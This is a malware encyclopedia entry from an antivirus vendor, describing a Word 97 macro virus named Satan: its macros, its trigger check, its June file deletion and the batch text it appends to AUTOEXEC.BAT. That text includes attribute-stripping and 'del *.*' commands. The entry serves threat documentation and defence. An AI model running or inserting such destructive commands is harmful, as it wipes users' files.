Vulnerabilities Threats

English Russian Japanese LatAm Türkiye Brasil France Český Deutschland

Virus.MSWord.Satan

Home Threats Virus Virus.MSWord.Satan
Class Virus
Platform MSWord
Description

Technical Details


This virus contains 14 macros in one module “Satan666”: Satan666, FileOpen,
FileClose, FileSaveAs, FileSave, FileNew, AutoExec, AutoNew, AutoSave,
AutoClose, AutoOpen, ToolsOptions, ViewVBCode, ToolsMacro. The virus
infects the system and documents on calling any of these macros.


The ToolsMacro and ViewVBCode functions are available only if the first
line in C:AUTOEXEC.BAT file contains the text:



REM Hail Satan!

Else the virus cancels these procedures and displays the MessageBox:


Microsoft Visual Basic

Sub or Function not defined

In June the virus erases the files and directory:


c:windows*.*

c:windowssystem*.*

c:My Documents

It then appends to the C:AUTOEXEC.BAT file the text:


@echo off

cls

echo Hail Satan!

echo Hail Satan!

echo Hail Satan!

echo Hail Satan!

echo Hail Satan!

echo Hail Satan!

echo Hail Satan!

echo Hail Satan!

echo Y>Yes

attrib -h -r -s

del *.* 

and displays the MessageBox:




Satan666 Word97 Virus

Hail Satan!
Find out the statistics of the threats spreading in your region
© 2023 AO Kaspersky Lab. All Rights Reserved.
Privacy Policy Cookies

Up